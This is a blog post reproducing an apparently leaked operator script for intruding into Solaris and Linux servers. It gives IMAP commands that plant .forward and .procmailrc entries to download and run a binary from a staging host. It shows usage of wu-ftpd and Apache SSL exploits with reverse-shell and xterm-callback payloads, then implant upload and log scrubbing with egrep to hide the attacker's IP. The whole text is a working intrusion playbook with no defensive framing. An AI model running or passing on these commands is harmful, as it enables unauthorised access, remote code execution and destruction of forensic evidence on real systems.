|
| ### Imap masqerade |
| ### Bring a local to get root |
|
|
| ### for solaris |
|
|
| nc -v -l -p 53 < ../up/noserver-sparc-sun-solaris2.5.1 |
| noclient -l 25 |
| telnet TARGET_IP 143 |
|
|
| A000 LOGIN user password |
| A001 EXAMINE /etc/mail/sendmail.cf |
| A002 FETCH 1 RFC822 |
| A003 EXAMINE /etc/passwd |
| A004 FETCH 1 RFC822 |
| A003 EXAMINE /etc/shells |
| A004 FETCH 1 RFC822 |
| A005 EXAMINE .forward |
| A006 CREATE .forward |
| A007 CREATE .forward |
| A008 APPEND .forward (\Seen) {145} |
| "| /bin/ksh -c '/bin/cat |
/tmp/sendmail;chmod +x /tmp/sendmail;D=-cPITCH_IP:25 PATH=/tmp sendmail;rm -f /tmp/sendmail'"
A009 DELETE .forward
A010 LOGOUT
telnet PITCH_IP 25
HELO helo
MAIL FROM: user@itt.beta.net
RCPT TO: user@itt.beta.net
DATA
.
QUIT
# echo -e "HTTP/1.0 200\n" > new
# cat new noserver-2.6.1-i586.pc.linux.gnu.redhat-5.0 > sendmail
# nc -v -l -p 53 < sendmail
# noclient -l 25
telnet TARGET_IP 143
A000 LOGIN user password
A001 EXAMINE /etc/mail/sendmail.cf
A002 FETCH 1 RFC822
A003 EXAMINE /etc/passwd
A004 FETCH 1 RFC822
A003 EXAMINE /etc/shells
A004 FETCH 1 RFC822
A100 LIST /etc/smrsh *
A005 EXAMINE .forward
A006 CREATE .forward
A007 CREATE .forward
A008 APPEND .forward (\Seen) {11}
"| slocal"
A100 CREATE .maildelivery
A101 APPEND .maildelivery (\Seen) {37}
To user pipe A >/home/user/.g
A102 LIST "" %
A102 RENAME .g .procmailrc
A008 APPEND .procmailrc (\Seen) {128}
:0 c
|cd /tmp;wget http://PITCH_IP:53/sendmail; chmod +x /tmp/sendmail;D=-cPITCH_IP:25 PATH=/tmp sendmail;rm -f sendmail
A009 DELETE .forward
A009 DELETE .maildelivery
A009 DELETE .procmailrc
A010 LOGOUT
telnet localhost 25
HELO helo
MAIL FROM: user@localhost.localdomain
RCPT TO: user@localhost.localdomain
DATA
.
QUIT
telnet fawn 143
A000 LOGIN user password
A001 EXAMINE /etc/mail/sendmail.cf
A002 FETCH 1 RFC822
A003 EXAMINE /etc/passwd
A004 FETCH 1 RFC822
A003 EXAMINE /etc/shells
A004 FETCH 1 RFC822
A102 LIST "/usr/bin/X11" %
A005 EXAMINE .forward
A006 CREATE .forward
A007 CREATE .forward
A008 APPEND .forward (\Seen) {50}
"| /usr/bin/*11/xterm -display PITCH_IP:26000"
A009 DELETE .forward
A010 LOGOUT
telnet fawn 25
HELO helo
MAIL FROM: user@fawn.beta.net
RCPT TO: user@fawn.beta.net
DATA
.
QUIT
### cleanup
possible logging in /var/adm/messages (should blend in if it fails)
###########################################################
# EXPOUNDATOM
###########################################################
# Requires the target to have the wu-2.6.1 FTP service running
# Requires anonymous ftp access (determined if exploit works)
# -scan ftp TARGET_IP
# A maximum of two tries can be attempted.
#
# Syntax
# ./wu-261-linux -h
# For target list:
# ./wu-261-linux -t0 -h
# No redirection:
./wu-261-linux TARGET_IP 21 VERSION
# w/ redirection:
-tunnel
l 21 TARGET_IP
# Locally:
./wu-261-linux -a -d 127.0.0.1
./wu-261-linux -t17 -d 127.0.0.1
# SHould give you root; need to upload nopen
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
which uudecode uncompress
# gedit sendmail
uudecode; ls -latr
uncompress sendmail.Z
ls -la
chmod 700 sendmail
PATH=. sendmail
# IF it complains about the user/pass correct, then it's not vulnerable to
# our pair that we try to send it;
# Cleanup:
# /var/log/messages (look for ftp access)
# /var/adm/utmpx, wtmpx
# /var/log/secure
###################################################
### EMBERSNOUT
###################################################
# must verify that box is RH9.0(SHRIKE) and that
# httpd is "Apache/2.0.40 (Red Hat Linux)
-scan telnet TARGET_IP
-scan ssh TARGET_IP
-scan ssl TARGET_IP
# Notes:
# this indicates it's RH9.0 but could be either Psyche or Shrike:
# (Linux release 2.4.20-8custom #3 SMP Thu Aug 28 13:56:20 EDT 2003)
# seeing this indicates (Shrike) because the version is bundled with it:
# SH-1.99-OpenSSH_3.5p1
# this version of Apache is needed but Psyche comes with 2.0.40-8 and
# Shrike comes with 2.0.40-21; the release in not determinable from
# a scan; just verify it's what is expected:
# Server: Apache/2.0.40 (Red Hat Linux)
#
# op box should work - depends if python is included
rpm -qf /usr/bin/python
# should see: python-base-2.2-9mdk
# if you want it to pop an xterm back to your screen:
# - make sure 6000 is listening
# - run xhost +
./es.py
Arguments: ['./es.py']
Usage -> ./es.py ip port packet_size start_ebp end_ebp ebp_inc hex_pad_byte "cmd"
where...
ip............target IP address
port..........target httpd TCP port number (usually 443)
packet_size...attack packet length in bytes
start_ebp.....guessed %ebp value to start with
end_ebp.......guessed %ebp value to end with
ebp_inc.......how many stack bytes to bump %ebp each time
hex_pad_byte..packet filling byte (0x0 will do randomized fill)
"cmd".........ASCII command string to be executed on target
### Locally
netstat -an |grep 6000
xhost +
########### REDIRECTED:
### Redirector:
-tunnel
l 443 TARGET_IP
r 6006 127.0.0.1 6000
r NETCAT_PORT
### In a local scripted window, set up a netcat to listen for a connection:
nc -vv -l -p NETCAT_PORT
### Locally (choose a method):
### This one will send command results back to a netcat window (not interactive)
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 (/bin/uname -a; /usr/bin/id; /bin/ps -auxww; /bin/w)|/usr/
bin/telnet PITCH_IP NETCAT_PORT"
### This one gives you an interactive window:
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(sh
&0 2>&0)"
# or for ksh:
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(ksh -c "sh
&0 2>&0")"
### This one pops back an xterm (be patient for it to pop back and keep mouse clear of window):
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "/usr/bin/X11/xterm -display PITCH_IP:6 -e /bin/sh"
############ No Redirection:
./es.py TARGET_IP 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 (/bin/uname -a; /usr/bin/id; /bin/ps -auxww; /bin/w)|/usr/
bin/telnet LOCALIP NETCAT_PORT"
./es.py TARGET_IP 443 5000 HIT_STRING 0xbffffff0 0x4 0x0 "(/usr/bin/X11/xterm -display LOCALIP:0 -e /bin/sh)"
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(sh
&0 2>&0)"
### if the exploit stalls after a bit, hit Ctl-C to wake it up, which
### prompts you if you want to continue - hit 'y'
### watch for a connection back to your netcat window
### Once you have access........
### you need to first clean extraneous processes started by httpd
### run this to help clean:
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
pwd
exec 3<&- 4<&- 5<&- 6<&- 7<&- 8<&- 9<&- 10<&- 11<&- 12<&- 13<&- 255<&-
/usr/sbin/lsof |grep ^sh
uname -a; id
mkdir -p /tmp/.httpd-lock; chmod 700 /tmp/.httpd-lock; ls -lctra /tmp
cd /tmp/.httpd-lock; pwd
which uudecode uncompress
#telnet PITCH_IP NETCAT_PORT
#uncompress crond.Z; chmod 700 crond; ls -la
# if no uudecode, use this
### locally:
# nc -l -vv -p NETCAT_PORT < crond
### back on target window:
#/bin/cat
/tmp/.httpd-lock/crond
chmod 700 crond
PATH=. crond
PATH=. D=-cPITCHIP:NOPEN_PORT crond
rm crond
-nstun TARGET_IP
-nrtun NOPEN_PORT
noclient TARGET_IP
### need to elevate so you can clean logs (use eventstart - ptrace won't work on RH9)
### Logging:
-lt /var/log/httpd
/var/log/httpd/ssl_access_log
/var/log/httpd/ssl_request_log
/var/log/httpd/ssl_error_log
/var/log/httpd/error_log
-lt /var/log
/var/log/messages
/var/log/secure
/var/log/maillog
egrep -v PITCH_IP /var/log/httpd/ssl_access_log > t; cat t > /var/log/httpd/ssl_access_log
egrep -v PITCH_IP /var/log/httpd/ssl_request_log > t; cat t > /var/log/httpd/ssl_request_log
egrep -v PITCH_IP /var/log/httpd/error_log > t; cat t > /var/log/httpd/error_log
egrep -v Segmentation /var/log/httpd/error_log > t; cat t > /var/log/httpd/error_log
egrep -v PITCH_IP /var/log/httpd/ssl_error_log > t; cat t > /var/log/httpd/ssl_error_log
egrep -v PITCH_IP /var/log/messages > t; cat t > /var/log/messages
egrep -v PITCH_IP /var/log/secure > t; cat t > /var/log/secure
egrep -v PITCH_IP /var/log/maillog > t; cat t > /var/log/maillog
https://github.com/x0rz/EQGRP/blob/master/Linux/etc/opscript.txt
No comments:
Post a Comment